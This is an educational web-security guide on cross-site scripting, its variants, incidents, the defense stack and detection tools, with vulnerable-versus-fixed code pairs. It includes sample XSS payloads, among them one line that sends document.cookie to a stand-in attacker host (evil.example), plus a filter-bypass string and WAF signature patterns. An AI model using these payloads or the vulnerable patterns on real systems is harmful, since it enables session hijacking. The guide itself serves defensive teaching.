Cross-site scripting is the oldest browser-side vulnerability class still in regular rotation, and it remains, in 2026, the most common high-severity finding in web application bug bounty programs across HackerOne, Bugcrowd, and Intigriti. The textbook framing — reflected, stored, DOM — gives developers a starting taxonomy, but every XSS attack reduces to the same single pattern: untrusted data is interpreted as code by the browser, when the developer's mental model treated the data as inert content. This guide is the pillar of our cross-site scripting cluster: the anatomy that unifies every variant, the flows of reflected, stored, and DOM-based XSS with real XSS attack examples, the exotic mutation and blind variants, the OWASP A03 reorganization that absorbed XSS into injection, defense-in-depth from CSP through framework defaults, the detection coverage that catches what slips through, and the closing reminder that XSS vulnerabilities are a developer fluency problem more than a tooling problem.
What Is Cross-Site Scripting and Why Does It Stay Dangerous in 2026
Cross-site scripting is a vulnerability class in which an attacker injects script — usually JavaScript, sometimes HTML or attribute payloads that activate JavaScript indirectly — into a page rendered by a victim's browser. The script runs in the origin of the vulnerable application, which means it inherits the same trust the victim's browser grants the application: cookies, session tokens, localStorage, the ability to read the DOM, the ability to call same-origin endpoints with the user's credentials. The attacker, sitting in a different origin, has effectively run code in the victim's session — without compromising the server, without phishing the victim's password, without exploiting a network-level weakness.
The class has been on the OWASP Top 10 since the list's earliest revisions. It was a standalone category through 2017 and was absorbed into the broader injection category as part of OWASP A03 in the 2021 revision — a reorganization we cover in detail in our OWASP A03 injection developer guide and the broader OWASP Top 10 2025 changes. The reorganization is conceptually correct — XSS is, formally, injection of untrusted data into an HTML/JavaScript interpreter — but operationally XSS has its own mitigation patterns, tooling, and developer fluency requirements that distinguish it from server-side injection prevention.
The reason XSS persists in 2026 — despite framework auto-escape, Content Security Policy, Trusted Types, and the moves toward server components — is that the attack surface tracks the rendering surface. Every place an application combines untrusted input with HTML or JavaScript is a potential XSS vulnerability. Single-page apps shifted the surface into client-side JavaScript and exploded the DOM-based variants. Email clients render HTML with their own quirks. Embedded webviews in mobile apps render HTML in contexts where CSP is harder to enforce. Browser extensions and Electron apps execute web content with elevated privilege. The class doesn't go away because the rendering surface doesn't go away; it migrates between layers as the rendering layers themselves migrate.
The Single Pattern Under All XSS Variants
Every XSS variant — reflected, stored, DOM, mutation, blind, self — reduces to the same four-element pattern. First, an untrusted source: a request parameter, a stored database row, a URL fragment, a postMessage payload, a window.name, an injected header. Second, a rendering context in the browser: HTML body, attribute value, JavaScript context, CSS context, URL context. Third, a composition step in which the untrusted data is concatenated into HTML or JavaScript that the browser will parse. Fourth, the browser's parsing of the combined output as a structured language in which the boundary between markup and content depends on what characters appear in the content rather than on a separate channel.
The reason cross-site scripting is so persistent across rendering stacks is that the third and fourth elements are inherent to how browsers parse HTML. The HTML parser has no separate channel for "this part of the string is a literal text node, do not parse it as markup." When developer code concatenates user input into an HTML string — whether server-side via template, client-side via innerHTML, or anywhere in between — the parser cannot distinguish data from markup, and any character it treats as syntactic (<, >, ", ', &) becomes an injection vector. The same is true for JavaScript context, where untrusted data concatenated into an expression becomes evaluable code.
The remediation pattern follows from the diagnosis: provide the browser with a separate channel for code and data, so the boundary is enforced by the protocol rather than by the contents of the string. In HTML body context, that means output encoding — converting the five HTML special characters to entities so the parser treats them as text. In attribute context, it means quoting the attribute and encoding the matching quote character plus ampersand. In JavaScript context, it means JSON-encoded data dropped into a fixed expression, never raw concatenation. In URL context, it means percent-encoding plus protocol allowlisting. The pattern is the same across contexts: separate the markup channel from the data channel and use the context's encoding mechanism, not string concatenation.
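The HTML-body encoding rule above can be sketched as a tiny helper (escapeHtml is a hypothetical name, not a built-in; production code should lean on the framework's auto-escaping rather than hand-rolled encoders):

```javascript
// Minimal sketch of HTML body/attribute output encoding: convert the
// five HTML special characters to entities so the parser can only
// ever treat the value as a text node, never as markup.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// A script payload becomes inert text:
console.log(escapeHtml('<script>alert(1)</script>'));
// &lt;script&gt;alert(1)&lt;/script&gt;
```

Because ENT_QUOTES-style quote handling is included (both quote characters are encoded), the same helper is safe for quoted-attribute context as well as HTML body context.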
The first vulnerable-versus-fixed pair below shows the simplest possible form of this principle in PHP — the language where raw HTML output is the default and developer discipline is the only thing standing between input and injection:
<?php
// Vulnerable: raw output of request parameter
echo "<p>You searched for: " . $_GET['q'] . "</p>";
// An attacker visits /search.php?q=<script>fetch('//evil.example/'+document.cookie)</script>
// The browser parses the script tag and runs it in the application's origin.
?>

<?php
// Fixed: HTML-encode before output
$q = htmlspecialchars($_GET['q'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo "<p>You searched for: " . $q . "</p>";
// The browser sees <script> as text, not as a tag.
// The five HTML special characters are converted to entities;
// ENT_QUOTES handles both single and double quotes for attribute safety.
?>

The diff is small. The behavior is fundamentally different — the browser in the second form treats the parameter as text content, with no possibility of reinterpretation as markup. This is the canonical XSS fix in the simplest context, and the same pattern extends to every templating engine and rendering layer.
Reflected XSS — The Echo Chamber
Reflected XSS is the variant where the malicious payload travels in the request and is reflected — typically without persistence — into the response. The attacker crafts a URL, social-engineers the victim into clicking it, and the application echoes the URL's parameter into the rendered page where the browser parses and executes it. The payload lives in the URL; the vulnerability lives in whatever code path generates the response.
The classic flow is search results pages, error messages, and parameter-driven status indicators. A search endpoint takes ?q=... and renders "You searched for: {q}" in the response. The endpoint reflects the parameter without encoding. The attacker's link sends the victim to /search?q=<script>...</script>; the response includes the script literally; the browser executes it. Modern frameworks largely eliminate reflected XSS in HTML body context through auto-escaping, but the variant persists in three places where auto-escaping doesn't reach: legacy server-rendered code paths, error pages and 404 templates that predate framework adoption, and any place developers use the framework's "raw HTML" escape hatch (Express's res.send with concatenated strings, Django's mark_safe, Rails's raw or html_safe, JSP scriptlets) without re-applying encoding.
Reflected XSS is the lowest-impact XSS variant on a per-victim basis — it requires the attacker to deliver the URL to each victim individually, typically through phishing or malicious advertising — but the impact per successful click is identical to stored XSS: full session compromise in the application's origin. We cover the reflected variant's flows, payload patterns, and the specific encoding rules per context in our dedicated reflected cross-site scripting developer guide, including the encoding-by-context table that maps HTML body, attribute, JavaScript, CSS, and URL sinks to their correct encoders.
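As a minimal illustration of why the encoder is sink-specific, the same payload run through the HTML body/attribute entity set and through the platform's URL encoder produces different, context-appropriate outputs (the inline entity map is a sketch; encodeURIComponent is the real platform API for URL query components):

```javascript
// One untrusted value, different sink contexts, different encoders.
const payload = `"><script>alert(1)</script>`;

// HTML body context: entity-encode the five special characters.
const forHtmlBody = payload.replace(/[&<>"']/g, (c) => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
}[c]));

// Quoted-attribute context: the quote and ampersand are the critical
// characters, and the same five-entity set covers them.
const forAttribute = forHtmlBody;

// URL context (query component): percent-encoding via the platform API.
const forUrl = encodeURIComponent(payload);

console.log(forHtmlBody); // &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
console.log(forUrl);      // %22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
```

A value encoded for one context and dropped into another remains exploitable, which is why the per-sink table matters more than any single encoder.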
Stored XSS — The Persistence Amplifier
Stored XSS is the variant where the malicious payload is written into the application's database, file system, or other persistent store, and then served back to every viewer of the affected resource. The injection happens once; the exploitation happens repeatedly, every time a user views the affected page. The amplification is what makes stored XSS the highest-severity XSS variant — a single successful injection compromises every viewer until the payload is found and removed.
The classic surfaces are user profiles (display name, bio, avatar URL), comments and forum posts, product reviews, support ticket messages, chat messages, file names in shared file managers, and any other field where one user's input is rendered to another user's browser. The 2014 eBay listing XSS case is the canonical example: attackers injected JavaScript into product listings, and every shopper who viewed the listing executed the script — credentials redirected to phishing pages, accounts hijacked, and the issue lingered for months because the listing rendering treated certain HTML as legitimate seller formatting. The pattern has recurred across every user-content platform that ever existed: the assumption that "data from the database is safe to render" produces XSS at the second use, even when the input boundary applied validation. We cover the persistence amplifier, the DOM-based stored variants in single-page apps, and the rich-text editor sanitization tradeoffs in our stored cross-site scripting developer guide.
The vulnerable-versus-fixed pair below shows the most common stored-XSS sink in vanilla JavaScript — innerHTML assignment, which parses the assigned string as HTML and creates DOM nodes from any markup it contains:
// Vulnerable: innerHTML parses the string as HTML
const comment = await fetchComment(id); // returns user-submitted text
document.querySelector('#comment-body').innerHTML = comment.text;
// If comment.text contains "<img src=x onerror=alert(1)>",
// the img tag is created and the onerror handler fires.
// Note: <script> tags inserted via innerHTML do NOT execute,
// but every other JS-bearing element (img/onerror, svg/onload,
// iframe/src=javascript:, body/onload via fragment, etc.) does.

// Fixed: textContent treats the value as text, never as markup
const comment = await fetchComment(id);
document.querySelector('#comment-body').textContent = comment.text;
// The browser inserts a single text node. No HTML parsing happens.
// This is the correct fix for any comment-rendering path that
// renders plain text. For rich-text rendering, see the React
// dangerouslySetInnerHTML + DOMPurify pattern below.

The fix is one identifier change. The behavioral difference is the entire vulnerability: innerHTML invokes the HTML parser; textContent never does. Every place a codebase uses innerHTML, outerHTML, insertAdjacentHTML, or document.write with non-static input is a potential stored-XSS sink, and migrating to textContent wherever rich rendering is not actually required eliminates the class by construction.
DOM-Based XSS — When the Bug Lives Entirely in the Browser
DOM-based XSS is the variant where both the source and the sink live in client-side JavaScript, with no involvement from the server in the injection path. The attacker controls a value that JavaScript reads from a source — location.hash, location.search, document.referrer, postMessage data, window.name, localStorage, sessionStorage, indexedDB, the URL fragment after a hash routing change — and writes into a sink that triggers parsing or execution: innerHTML, document.write, eval, setTimeout(string), setInterval(string), Function(...), setAttribute('src', ...) on script-bearing elements, jQuery $(...) with HTML-looking input, location = ... for javascript: URLs.
The class exploded with the rise of single-page applications because the rendering surface moved into the client. A server-rendered application that auto-escapes on output is largely safe by default; a single-page application that fetches JSON and renders it client-side has its safety determined by what the client-side code does with the data, and the client-side code has its own family of dangerous APIs — most of them documented as "unsafe with untrusted input" but used routinely with input the developer did not realize was untrusted. The DOM-based variant is now the dominant XSS pattern in modern web architectures, and we cover the source-sink taxonomy, Trusted Types as the architectural mitigation, framework-specific gotchas in React/Vue/Angular/Svelte, and the static analysis approaches in our DOM-based cross-site scripting developer guide.
The vulnerable-versus-fixed pair below shows a routing pattern that appears in single-page apps that build their own hash-based router. The hash is read, parsed, and used to render a fragment of the page — a pattern that, with naive implementation, becomes a DOM-XSS sink:
// Vulnerable: location.hash flows directly into innerHTML
function renderRoute() {
// URL like /app#/welcome<img src=x onerror=alert(1)>
const fragment = location.hash.slice(1);
document.querySelector('#view').innerHTML =
`<h1>Welcome to ${fragment}</h1>`;
}
window.addEventListener('hashchange', renderRoute);
renderRoute();
// The hash is attacker-controllable via a crafted link.
// The img tag is parsed; onerror executes in the app's origin.

// Fixed: parse the route, render text via textContent
function renderRoute() {
const raw = location.hash.slice(1);
// Allowlist: only known route names, validated against a fixed map
const validRoutes = new Set(['welcome', 'profile', 'settings']);
const route = validRoutes.has(raw) ? raw : 'welcome';
const view = document.querySelector('#view');
view.replaceChildren(); // clear safely
const h1 = document.createElement('h1');
h1.textContent = `Welcome to ${route}`;
view.appendChild(h1);
}
// No HTML parsing of the hash. The route is constrained to an
// allowlist; even if an attacker injects an unknown value, it
// falls back to 'welcome' and is rendered as text via textContent.

The fix combines two patterns: input validation (the route allowlist) and safe rendering (textContent over innerHTML, with explicit DOM construction). Either alone would prevent the injection in this case; both together produce defense-in-depth against future code changes that might bypass one or the other.
React, Vue, and Angular components default to safe rendering — interpolated values are escaped — and the DOM-XSS surface in those frameworks concentrates around the explicit escape hatches. React's dangerouslySetInnerHTML is named to discourage its use; the name does not prevent its use. The vulnerable-versus-fixed pair below shows the canonical fix when rich-text rendering is genuinely required:
// Vulnerable: dangerouslySetInnerHTML with raw user-supplied HTML
import React from 'react';
function CommentBody({ comment }) {
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: comment.html }}
/>
);
}
// comment.html is whatever the user submitted. If they submitted
// "<img src=x onerror=stealCookies()>", the script runs.// Fixed: sanitize with DOMPurify before injecting
import React, { useMemo } from 'react';
import DOMPurify from 'dompurify';
function CommentBody({ comment }) {
const safeHtml = useMemo(
() => DOMPurify.sanitize(comment.html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href', 'title'],
ALLOWED_URI_REGEXP: /^(?:https?:|mailto:|#)/i,
}),
[comment.html]
);
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: safeHtml }}
/>
);
}
// DOMPurify parses the HTML, removes any tag/attribute not on the
// allowlist, strips javascript: URIs, neutralizes mutation XSS via
// its post-parse DOM walk. Maintained, audited, and the standard
// for client-side HTML sanitization in 2026.

DOMPurify is the only HTML sanitizer this guide recommends for client-side use. Roll-your-own sanitizers fail predictably against mutation XSS payloads (covered next) because they sanitize the input string rather than the parsed-and-reserialized DOM. DOMPurify parses the HTML, walks the DOM applying the allowlist, and serializes the result — the only defense that closes the mutation-XSS class, and the reason "use DOMPurify, do not write your own" is the consensus advice across appsec.
Mutation XSS and Exotic Variants
Beyond the reflected/stored/DOM taxonomy, several exotic XSS variants matter enough to recognize in code review and exploitation reports.
Mutation XSS (mXSS) exploits the gap between how a sanitizer parses HTML and how the browser parses HTML. A sanitizer accepts an input string, applies its allowlist of tags and attributes, and produces an output string. If the browser, when later parsing the sanitizer's output, mutates the DOM in a way the sanitizer didn't anticipate — through namespace confusion, broken CDATA handling, template-tag reparsing, or noscript-context shifts — the post-mutation DOM can contain script-bearing elements the sanitizer thought it had removed. The class was named by Mario Heiderich (Cure53) around 2013 and has been a recurring source of bypasses against every major HTML sanitizer that doesn't explicitly defend against it. DOMPurify is the only widely-used sanitizer that has tracked the mutation-XSS literature continuously and patches new bypasses as they're disclosed.
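A simpler cousin of the mutation problem shows why string-rewriting filters fail: deleting a forbidden token can recombine the surrounding fragments into the very token the filter removed. The naiveStrip function below is a deliberately broken example, not a real library, and mXSS proper exploits parser mutation rather than filter recombination, but the lesson is the same. Sanitize the parsed DOM, not the string:

```javascript
// A naive filter that deletes "<script>" and "</script>" substrings.
// Nesting the forbidden token inside itself defeats it: removal
// splices the outer fragments back together into a live script tag.
function naiveStrip(html) {
  return html.replace(/<\/?script>/gi, '');
}

const payload = '<scr<script>ipt>alert(1)</scr</script>ipt>';
const result = naiveStrip(payload);
console.log(result); // <script>alert(1)</script>
```

A DOM-based sanitizer is immune to this class by construction: it parses first, so there is no string left to recombine.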
Universal XSS (uXSS) is the variant where the bug lives in the browser itself, not the application — a browser flaw lets an attacker inject script into pages of any origin. uXSS is a browser-vendor problem rather than a developer problem, but it matters in this guide because it shapes the threat model: defense-in-depth assumes the browser is trustworthy, and uXSS is the case where that assumption breaks. Cross-Origin-Opener-Policy, Cross-Origin-Embedder-Policy, Site Isolation, and the architectural moves toward process-per-origin reduce uXSS impact by isolating origins more strongly at the OS process level.
Blind XSS is the variant where the reflection happens in a context the attacker cannot directly observe — typically an admin panel, an internal logging tool, a customer-support back-office. The attacker injects the payload through a public-facing field (a contact form, a support ticket subject), and the payload activates when an internal user views the entry hours or days later. The attacker discovers the vulnerability through a callback — the payload phones home with cookies, screenshots, or DOM contents from the admin context. Tools like XSS Hunter (and its successors after the original was deprecated) instrument blind-XSS testing by automating the callback infrastructure. Blind XSS is the highest-impact reflected variant because the contexts where it activates are the highest-privilege ones.
Self-XSS is the variant where the attacker tricks the victim into pasting a payload into the victim's own browser console. It's not technically a vulnerability in the application — it requires the victim's active cooperation — but it's a social-engineering vector that targets the same end state (script execution in the application origin), which is why every major application now displays "do not paste anything here" warnings when the browser console is opened. Self-XSS is a user-education problem more than a developer problem, but the warning patterns are part of the standard frontend toolkit.
Why XSS Is OWASP A03 Now — The Renaming History
Cross-site scripting was a standalone OWASP Top 10 category from the list's earliest revisions through 2017. In OWASP Top 10 2017, XSS sat at A07. The 2021 revision absorbed it into the broader injection category — A03 — alongside SQL injection, NoSQL injection, command injection, LDAP injection, and other interpreter-injection classes. The 2025 list keeps the absorption: there is no standalone "Cross-Site Scripting" category on the current OWASP Top 10. XSS is one variant of A03, and a developer reading "A03: Injection" should understand that XSS is part of what the category covers.
The reorganization is conceptually defensible. XSS is, formally, injection — untrusted data flowing into an interpreter (the browser's HTML/JavaScript parser) without a separate channel for code and data. The same anatomy that produces SQL injection produces XSS, with the interpreter swapped from a SQL engine to a browser. The unification highlights the underlying pattern, which is the right teaching frame for developers building injection fluency in general.
The reorganization also has practical drawbacks. XSS-specific mitigations — context-aware output encoding, CSP, Trusted Types, framework-level escaping, sanitization libraries — don't translate cleanly to server-side injection categories. The bug bounty taxonomy still treats XSS as its own class for severity-rubric purposes. The developer skill required to recognize XSS in unfamiliar code is distinct enough from server-side injection recognition that most teams treat them separately in code-review checklists and SAST configuration. This guide reflects that practical reality: XSS lives under A03 in the OWASP taxonomy but is treated as its own discipline because the prevention patterns are different from the rest of A03.
Real-World XSS Incidents
The XSS class has produced enough public incidents over two decades that the patterns are easy to recognize in retrospect. Four are worth remembering as the canonical case studies.
Samy worm (MySpace, October 2005). Samy Kamkar published a self-replicating XSS worm on his MySpace profile that added "Samy is my hero" to the profile of every visitor and copied itself to those visitors' profiles. The worm exploited a stored XSS in MySpace's profile-rendering code combined with insufficient input filtering on profile content. Within roughly 20 hours, the worm had infected over a million profiles — fast enough that MySpace had to take the site down to clean it. Samy was prosecuted, sentenced to community service, and the incident became the canonical example of how stored XSS plus a self-replicating payload produces internet-scale impact from a single bug. The technical writeup Kamkar published after the incident is still required reading in appsec curricula.
Twitter retweet worm (September 2010). A stored XSS in Twitter's onmouseover handler for tweet content let a payload execute when a user hovered over an affected tweet. The worm spread through retweets — viewers' browsers automatically retweeted the payload, propagating it across the network. Within a few hours, accounts including the British prime minister's office and major media outlets had retweeted the worm. Twitter patched the underlying XSS within hours, but the incident demonstrated that stored XSS plus a high-velocity social platform produces propagation patterns reminiscent of biological viruses.
eBay listing XSS (2014, ongoing through early 2016). Researchers and journalists documented stored XSS in eBay listing descriptions where attackers injected JavaScript that redirected shoppers to phishing pages designed to look like eBay's login. The vulnerability persisted across multiple disclosures and took months to fully remediate, in part because the listing-rendering pipeline accepted certain HTML for legitimate seller formatting and the boundary between "allowed seller HTML" and "injected attacker HTML" was porous. The eBay case is the canonical reminder that rich-text rendering surfaces — anywhere users render formatted content to other users — are stored-XSS magnets unless sanitized through a maintained library.
British Airways Magecart (2018). The breach that exposed roughly 380,000 payment card details — initially fined £183 million by the ICO, later reduced to £20 million — was a Magecart-style attack in which a third-party JavaScript library on the BA checkout was modified to skim payment card data. While Magecart is more accurately a supply-chain attack than classic XSS, the underlying mechanism — attacker-controlled JavaScript executing in the application's origin and reading form data — is XSS-class behavior, and the defenses (CSP with strict-dynamic, Subresource Integrity, Trusted Types) are XSS defenses. Magecart is the modern XSS shape: not a payload in a comment field, but a compromise of a legitimate script the application loads. The defense-in-depth implications connect XSS prevention to the supply-chain integrity discipline covered in our software and data integrity failures (A08) guide.
Defense-in-Depth — The XSS Mitigation Stack
The variants and incidents above converge on a small set of mitigation patterns that, layered together, eliminate the vast majority of XSS vulnerabilities. No single layer is sufficient; the layering is what catches what each individual layer misses. The full layered approach — CSP nonces and strict-dynamic, Trusted Types, output encoding by context, sanitization for rich text, framework defaults, and the migration patterns to adopt them — is the subject of our dedicated XSS prevention defense-in-depth developer guide. The summary stack below names the layers and the role each plays.
Layer 1: Output encoding by context. Every place the application combines untrusted data with HTML, the data is encoded for the specific context — HTML body, attribute, JavaScript, CSS, URL. The encoding is sink-specific; a string safe for HTML body is not safe for JavaScript context, and a string safe for JavaScript is not safe for URL context. Modern templating engines apply context-aware auto-escaping when the context is determined at parse time; developers reach for the framework's auto-escape and avoid the raw-output escape hatches.
Layer 2: Framework-level safe-by-default rendering. React, Vue, Angular, and Svelte all default to escaping interpolated values. The framework treats interpolated expressions as text; HTML insertion requires an explicit escape hatch (dangerouslySetInnerHTML, v-html, [innerHTML], {@html}). The default-safe rendering eliminates most XSS by construction; the residual surface is the explicit escape hatches, which appear in code review as a finding to justify case by case.
Layer 3: HTML sanitization for rich-text rendering. Where the application genuinely needs to render user-supplied HTML — comments with formatting, rich-text editor output, email previews — a maintained sanitization library (DOMPurify on the client, the equivalents in server frameworks) parses the HTML, applies an allowlist of tags and attributes, strips dangerous URI schemes, and serializes the result. Roll-your-own sanitizers fail predictably against mutation XSS; the maintained libraries track the bypass literature and patch as needed.
Layer 4: Content Security Policy. CSP is the runtime control that limits what scripts the browser will execute. A strict CSP — with nonces or hashes for inline scripts, strict-dynamic for transitive script loading, 'unsafe-inline' never used in script-src, 'unsafe-eval' never used in script-src — turns successful XSS injection into a non-event because the injected script doesn't match the policy and the browser refuses to execute it. CSP is defense-in-depth, not a primary mitigation — it doesn't replace output encoding — but it shrinks the impact of an XSS bypass to "the script tries to run and is blocked," which is the difference between a P1 incident and a logged event. CSP overlaps with the broader configuration discipline in our security misconfiguration deep dive.
Layer 5: Trusted Types. A Chrome-and-Edge feature (with Firefox support landing in stable in 2025) that requires DOM sinks to receive Trusted Type objects rather than strings. With Trusted Types enforced, element.innerHTML = userInput throws — the assignment requires a TrustedHTML object produced by an explicitly registered policy. The architectural effect is that the application's DOM-XSS surface narrows from "every innerHTML assignment in the codebase" to "the Trusted Types policy registrations" — a much smaller surface to audit and lock down. Trusted Types is the strongest single architectural mitigation against DOM XSS in modern browsers, and adoption is the recommended path for new applications and the gradual-migration target for existing ones.
Layer 6: HttpOnly and Secure cookies. Marking session cookies HttpOnly means JavaScript cannot read them via document.cookie; an XSS payload that runs in the page can no longer exfiltrate the session token directly. The mitigation does not prevent XSS — the payload still runs same-origin and can issue authenticated requests on the user's behalf — but it shrinks the post-XSS impact and forces the attacker into in-session attacks rather than session theft. Secure ensures the cookie is only sent over HTTPS; SameSite=Lax or Strict mitigates the CSRF angle. The cookie attributes are a five-minute change with disproportionate downstream effect.
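The attribute set can be sketched as a Set-Cookie value builder (buildSessionCookie is a hypothetical helper name; real frameworks expose these as cookie options rather than raw header strings):

```javascript
// Session cookie with the three attributes from the text:
// HttpOnly blocks document.cookie access from script,
// Secure restricts the cookie to HTTPS,
// SameSite=Lax mitigates the CSRF angle.
function buildSessionCookie(name, value) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    'HttpOnly',
    'Secure',
    'SameSite=Lax',
    'Path=/',
  ].join('; ');
}

console.log(buildSessionCookie('sid', 'abc123'));
// sid=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
```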
The vulnerable-versus-fixed pair below shows a pattern that combines several of these layers — JSON injection into an inline script context, a sink that auto-escaping doesn't handle correctly because the context is JavaScript rather than HTML:
<!-- Vulnerable: JSON.stringify in a script tag, with the assumption that
the result is "JavaScript-safe" because it's a JSON object -->
<script>
var initialState = ${JSON.stringify(serverData)};
</script>
<!-- If serverData contains the string "</script><script>alert(1)</script>",
JSON.stringify produces ""</script><script>alert(1)</script>"",
which closes the script tag and opens a new one. The HTML parser
wins over the JSON parser; injection succeeds. -->

<!-- Fixed: serialize JSON to a data attribute, parse on the client -->
<div id="bootstrap" data-state="${
htmlEncodeAttr(JSON.stringify(serverData))
}"></div>
<script>
var initialState = JSON.parse(
document.getElementById('bootstrap').dataset.state
);
</script>
<!-- The JSON is rendered as an HTML attribute value, encoded for
attribute context (ampersand and the matching quote escaped).
The script reads it via dataset and parses it with JSON.parse.
The HTML parser never sees the JSON contents as markup, and
the JSON parser never sees the contents as JavaScript. -->
<!-- Alternative fix when the data must inline into the script:
escape </, <!, and U+2028/U+2029 in the JSON string before
embedding. Frameworks like Next.js do this automatically in
the __NEXT_DATA__ script. -->

The fix relocates the data into an HTML attribute — a context where attribute encoding is straightforward and well-understood — and parses it on the client. The sink-mismatch problem (HTML parser vs JSON parser disagreeing on where the boundary is) is eliminated because the data and the script are in different contexts. Frameworks that bootstrap server state into client JavaScript should use this pattern by default, and most modern ones (Next.js, Remix, Nuxt, SvelteKit) do.
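The alternative fix described in the comment above, escaping the characters that let a parser break out of the inline script block, can be sketched as follows (safeJsonForScript is a hypothetical helper name; escaping every literal < also covers the </script> and <!-- cases):

```javascript
// Escape the characters that are dangerous inside an inline <script>
// but legal unescaped in JSON: '<' (tag-close / comment-open) and
// U+2028/U+2029 (line terminators in JS). The \uXXXX escapes are
// valid in both JSON and JavaScript string literals, so the value
// round-trips through JSON.parse unchanged.
function safeJsonForScript(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const state = { q: '</script><script>alert(1)</script>' };
const embedded = safeJsonForScript(state);
// embedded contains no literal '<', so the HTML parser can never see
// a closing tag inside it; JSON.parse recovers the original value.
```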
XSS Detection — SAST, DAST, IAST, WAFs
Detection of XSS vulnerabilities runs across multiple complementary tools. Each catches a different slice; the layering is what produces strong coverage. The tradeoffs across tool categories are documented in our IAST vs DAST vs SAST comparison guide.
SAST. Source-code scanners trace data flow from input sources to DOM/HTML sinks. SAST catches the syntactic patterns reliably — innerHTML assignment with non-static input, dangerouslySetInnerHTML with non-sanitized input, raw template output without auto-escape, eval/Function/setTimeout-string with input. CodeQL, Semgrep, Snyk Code, and SonarQube all ship XSS rule packs that catch the common patterns. The weakness is false positives on inputs that have upstream sanitization the scanner cannot prove, and false negatives on framework-specific sinks the scanner doesn't model. SAST is the right tool for "every PR that touches a rendering path" and the wrong tool for "is this specific dangerouslySetInnerHTML safe in production."
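As an illustration of the syntactic patterns SAST rules target, a minimal Semgrep rule for the innerHTML sink might look like the sketch below (the rule id and message are hypothetical; a production rule pack would also model sanitizer calls and taint sources to cut false positives):

```yaml
rules:
  - id: dom-xss-innerhtml-assignment
    languages: [javascript, typescript]
    severity: WARNING
    message: >
      innerHTML assignment with a non-literal value. Prefer
      textContent, or sanitize with DOMPurify before assigning.
    patterns:
      - pattern: $EL.innerHTML = $VALUE
      - pattern-not: $EL.innerHTML = "..."
```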
DAST. Black-box scanners send XSS payloads at the running application and observe whether the payloads activate. DAST catches the runtime behavior — the actual response when an injection payload reaches a browser parser. OWASP ZAP and Burp Suite are the standard, with extensive XSS payload libraries and the ability to detect reflected XSS reliably and stored XSS through a fuzz-then-verify second pass. DAST struggles with DOM XSS because the bug lives entirely client-side; specialized DOM-XSS scanners (DOMinator, Burp DOM Invader) instrument the browser to catch source-to-sink flow during scanning.
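The core reflected-XSS check a DAST scanner performs reduces to a simple sketch (the probe string and function are illustrative; real scanners like ZAP use large payload libraries and a browser-based verification pass):

```javascript
// A unique probe that only survives verbatim if the server echoes
// input without HTML-encoding it.
const PROBE = '"><zx9probe onpointerenter=1>';

function probeReflectedUnencoded(responseBody) {
  // Verbatim reflection means our quote, ">" and "<" reached the
  // HTML parser intact: a strong reflected-XSS signal. An encoded
  // reflection (&quot;&gt;&lt;...) does not match.
  return responseBody.includes(PROBE);
}

probeReflectedUnencoded('<input value="' + PROBE + '">');
// -> true: the page reflected the raw markup

probeReflectedUnencoded(
  '<input value="&quot;&gt;&lt;zx9probe onpointerenter=1&gt;">'
);
// -> false: the page encoded the probe, so the markup never activates
```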
IAST. Instruments the running application and observes data flow during test execution. IAST combines SAST's source-to-sink tracing with DAST's runtime confirmation. Contrast Security, Seeker, and Hdiv all ship XSS detection. The strength is high-confidence findings with low false-positive rates; the weakness is the instrumentation overhead and the requirement for representative test traffic.
WAFs and runtime protection. Web Application Firewalls block injection payloads at request time. WAF XSS rules catch obvious payload signatures — the <script> tags, the javascript: URIs, the onerror attributes — but miss obfuscated payloads, payloads in unusual encodings, and DOM-XSS entirely. WAFs are defense-in-depth, not primary mitigation. The recurring lesson from public bypasses (every major WAF has had public bypass writeups) is that WAF rules lag the payload literature and that a program relying on WAF as the primary XSS defense has misallocated investment.
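Why signature rules lag the payload literature can be shown with a deliberately naive ruleset (hypothetical, far cruder than any real WAF, but the failure mode is the same):

```javascript
// Three textbook signatures: the kind of patterns the paragraph lists.
const naiveRules = [/<script\b/i, /javascript:/i, /\bonerror\s*=/i];

const blockedByNaiveWaf = (input) =>
  naiveRules.some((rule) => rule.test(input));

blockedByNaiveWaf("<script>alert(1)</script>");    // -> true: signature hit
blockedByNaiveWaf("<img src=x onerror=alert(1)>"); // -> true: signature hit
blockedByNaiveWaf("<svg onload=alert(1)>");        // -> false: same effect,
// different event handler -- no rule ever listed onload
```

Every new event handler, encoding trick, or parser quirk requires a new rule, which is why signature-based blocking stays a defense-in-depth layer rather than a primary mitigation.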
Code review with an XSS lens. Every PR that touches a rendering path includes an explicit review for XSS — output encoding is in place, the framework's escape hatch is justified, the sanitizer's allowlist matches the use case, the CSP doesn't have unsafe-inline. Secure code review with an XSS-specific checklist consistently catches the class; review without one consistently misses it. The combination of SAST in CI on every PR, DAST in CI/CD on every staging deployment, IAST in long-running test environments, and code review with an XSS lens is the pattern that produces the strongest coverage in 2026.
The relationship between XSS and CSRF — the other classic browser-side attack class — is a frequent source of developer confusion. The two are different: XSS injects script into the application origin; CSRF tricks the user's browser into making authenticated requests to the application from a different origin. The defenses are largely orthogonal (output encoding for XSS, SameSite cookies + CSRF tokens for CSRF), and we cover the comparison in detail in our XSS vs CSRF comparison guide.
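The orthogonality is visible in where each defense lives (option names here follow the Express-style convention, shown only to illustrate the underlying Set-Cookie attributes):

```javascript
// XSS defense lives at the output boundary; CSRF defense lives on the
// cookie and in a per-request token. Neither substitutes for the other.
const sessionCookieOptions = {
  httpOnly: true,  // script cannot read the cookie: limits XSS impact
  secure: true,    // never sent over plain HTTP
  sameSite: "lax", // not sent on cross-site POSTs: the CSRF defense
};
// An XSS payload running in-origin still rides on same-origin requests
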